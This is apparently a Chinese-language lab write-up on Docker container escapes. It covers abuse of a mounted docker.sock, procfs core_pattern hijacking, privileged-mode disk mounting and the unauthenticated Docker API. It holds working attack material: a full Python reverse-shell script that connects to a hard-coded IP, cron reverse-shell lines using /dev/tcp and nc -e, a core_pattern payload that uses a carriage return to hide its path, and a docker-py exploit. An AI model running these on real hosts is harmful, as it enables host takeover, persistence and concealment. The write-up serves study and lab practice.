docker逃逸
docker.sock挂载逃逸
基础知识
Docker Client 和 Docker Daemon
-
Docker Client:这是用户通过命令行与 Docker 进行交互的工具(例如你输入的
docker run
命令)。它提供了一个用户界面来管理 Docker 容器和镜像。 - Docker Daemon:后台运行的服务(进程),负责管理 Docker 容器的创建、运行、停止等操作。它接收来自 Docker Client 的请求,并处理这些请求。
C/S架构
- C/S(Client/Server)架构是一种分布式计算模型,其中客户机(Client)发出请求,而服务器(Server)处理请求并返回结果。简单来说,客户端是用户的接口,服务器是处理数据和服务的地方。
通信方式
Docker Client 和 Docker Daemon 之间的通信可以通过以下方式进行:
-
unix:///var/run/docker.sock:
- 这是 Docker 的默认通信方式。
/var/run/docker.sock
是一个 Unix 域套接字文件,Docker Daemon 监听这个套接字。使用 Unix 套接字的好处是它不需要任何网络配置,通信速度较快,因为它在同一台机器上。
- 这是 Docker 的默认通信方式。
-
tcp://host:port:
- 这种方式通过 TCP/IP 协议进行通信,允许客户端与远程 Docker Daemon 进行交互。你需要指定 Docker Daemon 运行的主机地址和端口号。这种方式适合在分布式系统中使用,可以让多个客户端通过网络连接到同一个 Docker Daemon。
-
fd://socketfd:
- 这种方式使用文件描述符进行通信,适合某些特殊的场景。在这种情况下,Client 将通过文件描述符与 Daemon 进行通信,通常用于在容器内部进行进程间通信。
原理
我们平常使用的Docker命令中,docker即为client,Server端的角色由docker daemon(docker守护进程)扮演
使用docker.sock进行通信为默认方式,当容器中进程需在生产过程中与Docker守护进程通信时,容器本身需要挂载/var/run/docker.sock文件。
本质上而言,能够访问docker socket 或连接HTTPS API的进程可以执行Docker服务能够运行的任意命令,以root权限运行的Docker服务通常可以访问整个主机系统。
因此,当容器访问docker socket时,我们可通过与docker daemon的通信对其进行恶意操纵完成逃逸。若容器A可以访问docker socket,我们便可在其内部安装client(docker),通过docker.sock与宿主机的server(docker daemon)进行交互,运行并切换至不安全的容器B,最终在容器B中控制宿主机。
总结下来就是
利用docker socket的通信方法,我们可以起docker服务,可以再起一个恶意的docker(比如root权限,挂载到根目录),然后利用恶意的docker进行逃逸
实现
运行一个挂载/var/run/的容器
一般我们的docker.sock文件都在/var/run/下面
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu
当然进入容器后也可以执行如下命令查找
find / -name docker.sock
然后安装docker
apt-get update
apt-get install docker.io
之后再次run一个有漏洞的docker环境
docker run -it -v /:/host ubuntu:18.04 /bin/bash
这里就是制作一个有漏洞的docker环境,然后挂载到docker的host目录下面
我在我原本的服务器下创建了一个flag.txt文件
[sudo] lll 的密码:
┌──(root㉿kali)-[/home/lll]
└─# cd /
┌──(root㉿kali)-[/]
└─# vim flag.txt
┌──(root㉿kali)-[/]
└─#
然后我们可以看看是否成功
root@f6dedb7bb30b:/# cd /host
root@f6dedb7bb30b:/host# ls
bin dev flag.txt initrd.img lib lib64 media opt root sbin sys usr vmlinuz
boot etc home initrd.img.old lib32 lost+found mnt proc run srv tmp var vmlinuz.old
root@f6dedb7bb30b:/host#
可以发现成功了,现在其实就已经逃逸到外面了相当于,当然可以反弹一个shell,写个定时任务
echo '* * * * * bash -i >& /dev/tcp/ip/2333 0>&1' >> /host/var/spool/cron/root
这里我就直接删flag文件
root@f6dedb7bb30b:/host# ls
bin dev flag.txt initrd.img lib lib64 media opt root sbin sys usr vmlinuz
boot etc home initrd.img.old lib32 lost+found mnt proc run srv tmp var vmlinuz.old
root@f6dedb7bb30b:/host# rm flag.txt
然后回到原本的宿主机查看是否被删除
┌──(root㉿kali)-[/]
└─# ls
bin dev home initrd.img.old lib32 lost+found mnt proc run srv tmp var vmlinuz.old
boot etc initrd.img lib lib64 media opt root sbin sys usr vmlinuz
已经被删除,说明逃逸成功
挂载proc
基础知识
proc文件
它主要用于提供关于系统状态和进程的信息。procfs
的结构以文件和目录的形式组织,用户可以通过读取这些文件来获取系统和进程的各种信息,而不需要使用专门的系统调用。
/proc
目录下的内容是动态生成的,不是常驻于磁盘上的数据。这些内容通常包括:
- 进程信息:每个运行中的进程都有一个以其PID(进程ID)命名的子目录(如
/proc/1234
),里面包含了该进程的状态、内存使用情况、打开的文件描述符等信息。 - 系统信息:如
/proc/cpuinfo
(CPU信息),/proc/meminfo
(内存信息),/proc/version
(核版本)等。 - 配置参数:如
/proc/sys
目录下的文件,用户可以通过这些文件调整系统内核的各种参数。
通过它,用户可以实时获取操作系统的状态和各个进程的详细信息。
原理
从 2.6.19 内核版本开始,Linux 支持在 /proc/sys/kernel/core_pattern 中使用新语法。如果该文件中的首个字符是管道符 | ,那么该行的剩余内容将被当作用户空间程序或脚本解释并执行。
触发点在于/proc/sys/kernel/core_pattern负责配置进程崩溃时内存转储数据的导出方式。如果程序崩溃就会执行我们的命令
实现
搭建环境就
docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
一般我们以core_pattern 文件数量作为标准判定
find / -name core_pattern
如果找到两个 core_pattern 文件,那可能就是挂载了宿主机的 procfs
寻找绝对路径
这是因为Linux转储机制对/proc/sys/kernel/core_pattern内程序的查找是在宿主机文件系统进行的,所以我们需要找到绝对的路径
cat /proc/mounts | xargs -d ',' -n 1 | grep workdir
结果如下
root@45552954dcd4:/# cat /proc/mounts | xargs -d ',' -n 1 | grep workdir
workdir=/var/lib/docker/overlay2/82e9bf4baeaeef452bc9cf50a4c7ca11c8e108fe51e5f70546211fe46a06678c/work
因为我们需要执行文件,就需要下载一些基础的东西
安装 vim 和 gcc
apt-get update -y && apt-get install vim gcc -y
vim /tmp/.t.py
安装成功后我们就可以写一个反弹shell的py脚本了
#!/usr/bin/python3
import os
import pty
import socket
lhost = "49.232.222.195"
lport = 2333
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
# os.remove('/tmp/.lll.py')
s.close()
if __name__ == "__main__":
main()
然后给这个脚本一个可执行权限
chmod 777 .lll.py
然后按照漏洞原理的格式
echo -e "|/var/lib/docker/overlay2/82e9bf4baeaeef452bc9cf50a4c7ca11c8e108fe51e5f70546211fe46a06678c/merged/tmp/.lll.py \rcore " > /host/proc/sys/kernel/core_pattern
之后我们需要一个可以写一个可以让程序崩溃的代码
#include<stdio.h>
int main(void) {
int *a = NULL;
*a = 1;
return 0;
}
然后编译运行
gcc t.c -o t
./t
具体的原理参考
https://www.secrss.com/articles/17274
效果如下
root@45552954dcd4:/# echo -e "|/var/lib/docker/overlay2/82e9bf4baeaeef452bc9cf50a4c7ca11c8e108fe51e5f70546211fe46a06678c/merged/tmp/.lll.py \rcore " > /host/proc/sys/kernel/core_pattern
root@45552954dcd4:/# ./t
Segmentation fault (core dumped)
可以看到崩溃了
来到我们监听的服务器
root@VM-16-17-ubuntu:~# ncat -lvp 2333
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2333
Ncat: Listening on 0.0.0.0:2333
Ncat: Connection from 171.218.194.147.
Ncat: Connection from 171.218.194.147:6630.
root@kali:/#
可以看到已经连接成功了,逃逸成功
一些细节
首先为什么我们的脚本文件名是.lll.py
这是一个隐藏文件,直接ls是看不到的
root@kali:/# ls
ls
bin home lib32 mnt run tmp vmlinuz.old
boot initrd.img lib64 opt sbin usr
dev initrd.img.old lost+found proc srv var
etc lib media root sys vmlinuz
root@kali:/# ls -a
ls -a
. bin home lib32 mnt run tmp vmlinuz.old
.. boot initrd.img lib64 opt sbin usr
.cache dev initrd.img.old lost+found proc srv var
.lll.py etc lib media root sys vmlinuz
可以看见只有ls -a才能看见.lll.py
然后paylaod中空格加\r的作用
这里展示一下效果
root@VM-16-17-ubuntu:/# echo -e "|/tmp/123123/.x.py \rcore " >/flag
root@VM-16-17-ubuntu:/# cat flag
core /123123/.x.py
就是把真实的路径给遮住了
最后就是os.remove("/tmp/.lll.py")
在反弹shell的过程中删掉了用来反弹shell的程序自身。
特权模式
基础知识
参考https://www.bookstack.cn/read/openeuler-21.03-zh/70e0731add42ae6d.md
普通容器适合启动普通进程,其权限非常受限,仅具备/etc/default/isulad/config.json中capabilities所定义的默认权限。当需要特权操作时(比如操作/sys下的设备),需要特权容器完成这些操作,使用该特性,容器内的root将拥有宿主机的root权限, 否则,容器内的root在只是宿主机的普通用户权限。
所以延申出了特权模式
特权容器为容器提供了所有功能,还解除了设备cgroup控制器强制执行的所有限制,具备以下特性:
- Secomp不block任何系统调用
- /sys、/proc路径可写
- 容器内能访问主机上所有设备
- 系统的权能将全部打开
具体的如下
当容器为特权模式时,将添加以下权能
Capability Key | Capability Description |
---|---|
SYS_MODULE | 加载和卸载内核模块 |
SYS_RAWIO | 允许直接访问/devport,/dev/mem,/dev/kmem及原始块设备 |
SYS_PACCT | 允许执行进程的BSD式审计 |
SYS_ADMIN | 允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等 |
SYS_NICE | 允许提升优先级及设置其他进程的优先级 |
SYS_RESOURCE | 忽略资源限制 |
SYS_TIME | 允许改变系统时钟 |
SYS_TTY_CONFIG | 允许配置TTY设备 |
AUDIT_CONTROL | 启用和禁用内核审计;修改审计过滤器规则;提取审计状态和过滤规则 |
MAC_ADMIN | 覆盖强制访问控制 (Mandatory Access Control (MAC)),为Smack Linux安全模块(Linux Security Module (LSM)) 而实现 |
MAC_OVERRIDE | 允许 MAC 配置或状态改变。为 Smack LSM 而实现 |
NET_ADMIN | 允许执行网络管理任务 |
SYSLOG | 执行特权 syslog(2) 操作 |
DAC_READ_SEARCH | 忽略文件读及目录搜索的DAC访问限制 |
LINUX_IMMUTABLE | 允许修改文件的IMMUTABLE和APPEND属性标志 |
NET_BROADCAST | 允许网络广播和多播访问 |
IPC_LOCK | 允许锁定共享内存片段 |
IPC_OWNER | 忽略IPC所有权检查 |
SYS_PTRACE | 允许跟踪任何进程 |
SYS_BOOT | 允许重新启动系统 |
LEASE | 允许修改文件锁的FL_LEASE标志 |
WAKE_ALARM | 触发将唤醒系统的功能,如设置 CLOCK_REALTIME_ALARM 和 CLOCK_BOOTTIME_ALARM 定时器 |
BLOCK_SUSPEND | 可以阻塞系统挂起的特性 |
原理
如果启动特权模式,我们就可以挂载磁盘文件,可以理解为把宿主机的文件系统直接迁移到docker来了
实现
首先搭建环境
┌──(root㉿kali)-[/]
└─# docker run -it --privileged ubuntu:latest /bin/bash
root@5f9be5a4612f:/#
然后查看是否以特权模式启动
root@5f9be5a4612f:/# cat /proc/self/status | grep CapEff
CapEff: 0000003fffffffff
如果是以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff
可以看到我们这里是特权模式启动的
然后就是查找磁盘位置了
fdisk -l
之后挂载磁盘到我们的目录
root@5f9be5a4612f:/dev# mkdir /lll && mount /dev/sda1 /lll
先在原宿主机上创建一个flag
┌──(root㉿kali)-[/]
└─# vim flag
──(root㉿kali)-[/]
└─# ls
bin boot dev etc flag home initrd.img initrd.img.old lib lib32 lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
挂载后我们查看有没有flag
root@5f9be5a4612f:/lll# cd /lll
root@5f9be5a4612f:/lll# ls
bin dev flag initrd.img lib lib64 media opt root sbin sys usr vmlinuz
boot etc home initrd.img.old lib32 lost+found mnt proc run srv tmp var vmlinuz.old
可以发现是有的,说明成功了
当然我这个验证只是简单的验证,按理来说是要弹shell的
echo '* * * * * bash -i >& /dev/tcp/ip/2333 0>&1' >> /lll/var/spool/cron/root
docker未授权访问
环境就使用Vulhub
┌──(root㉿kali)-[/home/…/Desktop/vulhub/docker/unauthorized-rce]
└─# docker-compose up -d
这个打是比较好打的
或者也可以这样启动
dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375
可能会导致我们的docker服务在公网上暴露,如果直接访问,我们可以调用一些api恶意利用
这里我没有起服务了
参考https://xz.aliyun.com/t/12495?time__1311=GqGxRQq7qeuDlrzQ0%3DYqxiq7Ki%3DOfQYKx#toc-5
当你访问version会有如下一个效果
/containers/json会返回id字段
执行命令可以利用
POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188
{
"AttachStdin": true,
"AttachStdout": true,
"AttachStderr": true,
"Cmd": ["命令", "参数"],
比如(cat /etc/passwd)
"DetachKeys": "ctrl-p,ctrl-q",
"Privileged": true,
"Tty": true
}
逃逸还是使用定时任务
启动一个容器,并将主机/etc
文件夹挂载到容器,然后我们将可以对任何文件进行读/写访问。
我们可以将crontab配置文件中的命令放入反向shell中
import docker
client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
通过在 crontab 中注入命令来利用反向 shell